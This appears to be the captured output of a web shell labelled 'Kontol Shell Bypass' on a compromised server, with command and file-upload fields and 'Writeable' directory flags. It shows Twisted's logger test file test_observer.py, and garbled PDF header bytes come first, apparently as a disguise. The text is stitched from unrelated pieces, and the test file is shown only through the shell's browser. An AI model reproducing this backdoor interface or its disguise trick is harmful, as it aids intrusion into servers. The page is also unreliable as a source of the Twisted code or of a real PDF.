%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/thread-self/root/usr/lib/python3/dist-packages/twisted/logger/test/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/thread-self/root/usr/lib/python3/dist-packages/twisted/logger/test/test_observer.py
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Test cases for L{twisted.logger._observer}.
"""

from zope.interface.verify import verifyObject, BrokenMethodImplementation

from twisted.trial import unittest

from .._logger import Logger
from .._observer import ILogObserver
from .._observer import LogPublisher



class LogPublisherTests(unittest.TestCase):
    """
    Tests for L{LogPublisher}.
    """

    def test_interface(self):
        """
        L{LogPublisher} is an L{ILogObserver}.
        """
        publisher = LogPublisher()
        try:
            verifyObject(ILogObserver, publisher)
        except BrokenMethodImplementation as e:
            self.fail(e)


    def test_observers(self):
        """
        L{LogPublisher.observers} returns the observers.
        """
        o1 = lambda e: None
        o2 = lambda e: None

        publisher = LogPublisher(o1, o2)
        self.assertEqual(set((o1, o2)), set(publisher._observers))


    def test_addObserver(self):
        """
        L{LogPublisher.addObserver} adds an observer.
        """
        o1 = lambda e: None
        o2 = lambda e: None
        o3 = lambda e: None

        publisher = LogPublisher(o1, o2)
        publisher.addObserver(o3)
        self.assertEqual(set((o1, o2, o3)), set(publisher._observers))


    def test_addObserverNotCallable(self):
        """
        L{LogPublisher.addObserver} refuses to add an observer that's
        not callable.
        """
        publisher = LogPublisher()
        self.assertRaises(TypeError, publisher.addObserver, object())


    def test_removeObserver(self):
        """
        L{LogPublisher.removeObserver} removes an observer.
        """
        o1 = lambda e: None
        o2 = lambda e: None
        o3 = lambda e: None

        publisher = LogPublisher(o1, o2, o3)
        publisher.removeObserver(o2)
        self.assertEqual(set((o1, o3)), set(publisher._observers))


    def test_removeObserverNotRegistered(self):
        """
        L{LogPublisher.removeObserver} removes an observer that is not
        registered.
        """
        o1 = lambda e: None
        o2 = lambda e: None
        o3 = lambda e: None

        publisher = LogPublisher(o1, o2)
        publisher.removeObserver(o3)
        self.assertEqual(set((o1, o2)), set(publisher._observers))


    def test_fanOut(self):
        """
        L{LogPublisher} calls its observers.
        """
        event = dict(foo=1, bar=2)

        events1 = []
        events2 = []
        events3 = []

        o1 = lambda e: events1.append(e)
        o2 = lambda e: events2.append(e)
        o3 = lambda e: events3.append(e)

        publisher = LogPublisher(o1, o2, o3)
        publisher(event)
        self.assertIn(event, events1)
        self.assertIn(event, events2)
        self.assertIn(event, events3)


    def test_observerRaises(self):
        """
        Observer raises an exception during fan out: a failure is logged, but
        not re-raised.  Life goes on.
        """
        event = dict(foo=1, bar=2)
        exception = RuntimeError("ARGH! EVIL DEATH!")

        events = []

        def observer(event):
            shouldRaise = not events
            events.append(event)
            if shouldRaise:
                raise exception

        collector = []

        publisher = LogPublisher(observer, collector.append)
        publisher(event)

        # Verify that the observer saw my event
        self.assertIn(event, events)

        # Verify that the observer raised my exception
        errors = [
            e["log_failure"] for e in collector
            if "log_failure" in e
        ]
        self.assertEqual(len(errors), 1)
        self.assertIs(errors[0].value, exception)
        # Make sure the exceptional observer does not receive its own error.
        self.assertEqual(len(events), 1)


    def test_observerRaisesAndLoggerHatesMe(self):
        """
        Observer raises an exception during fan out and the publisher's Logger
        pukes when the failure is reported.  The exception does not propagate
        back to the caller.
        """
        event = dict(foo=1, bar=2)
        exception = RuntimeError("ARGH! EVIL DEATH!")

        def observer(event):
            raise RuntimeError("Sad panda")

        class GurkLogger(Logger):
            def failure(self, *args, **kwargs):
                raise exception

        publisher = LogPublisher(observer)
        publisher.log = GurkLogger()
        publisher(event)

        # Here, the lack of an exception thus far is a success, of sorts


    def test_trace(self):
        """
        Tracing keeps track of forwarding to observers.
        """
        event = dict(foo=1, bar=2, log_trace=[])

        traces = {}

        # Copy trace to a tuple; otherwise, both observers will store the same
        # mutable list, and we won't be able to see o1's view distinctly.
        o1 = lambda e: traces.setdefault(1, tuple(e["log_trace"]))
        o2 = lambda e: traces.setdefault(2, tuple(e["log_trace"]))

        publisher = LogPublisher(o1, o2)
        publisher(event)

        self.assertEqual(traces[1], ((publisher, o1),))
        self.assertEqual(traces[2], ((publisher, o1), (publisher, o2)))

Kontol Shell Bypass